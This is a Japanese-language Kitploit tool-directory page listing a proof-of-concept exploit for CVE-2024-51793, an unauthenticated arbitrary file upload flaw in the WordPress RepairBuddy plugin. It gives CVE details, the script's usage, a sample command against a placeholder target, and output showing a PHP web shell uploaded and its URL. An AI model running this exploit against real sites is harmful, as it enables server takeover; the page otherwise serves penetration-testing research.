Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-51793 — WordPress RepairBuddy プラグイン <= 3.8115 - 任意ファイルアップロードの脆弱性 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-51793
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubnxploited/cve-2024-51793

CVE-2024-51793

WordPress RepairBuddy プラグイン <= 3.8115 - 任意ファイルアップロードの脆弱性

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛡️ WordPress RepairBuddy プラグインのエクスプロイト

📜 CVE 情報

CVE-ID: CVE-2024-51793
公開日: 2024-11-11
更新日: 2024-11-11
タイトル: WordPress RepairBuddy プラグイン <= 3.8115 - 任意ファイルアップロードの脆弱性
説明:
Webful Creations Computer Repair Shop における危険なタイプのファイルの無制限アップロードの脆弱性により、Web サーバーへの Web シェルのアップロードが可能になります。この問題は Computer Repair Shop の n/a から 3.8115 までに影響します。

CWE:

  • CWE-434: 危険なタイプのファイルの無制限アップロード

CVSS:

  • スコア: 10.0 (CRITICAL)
  • バージョン: 3.1
  • ベクトル文字列: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

📋 説明

これは、WordPress RepairBuddy プラグインのバージョン <= 3.8115 における任意ファイルアップロードの脆弱性に対する概念実証 (PoC) エクスプロイトです。このエクスプロイトにより、攻撃者は脆弱なサーバーに Web シェルをアップロードできます。

⚙️ 要件

  • Python 3.x
  • requests ライブラリ (pip install requests)

🚀 使い方

root@kitploit:~
usage: 
CVE-2024-51793.py [-h] -u URL [-shell SHELL]

WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL
  -shell SHELL   Shell code to upload

📖 例

root@kitploit:~
python 
CVE-2024-51793.py -u http://target.com/wordpress

📝 出力

root@kitploit:~
Exploit By : Nxploit Khaled Alenazi,

🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php

👨‍💻 作成者

エクスプロイト作成者: Nxploited, Khaled Alenazi

ツールをダウンロード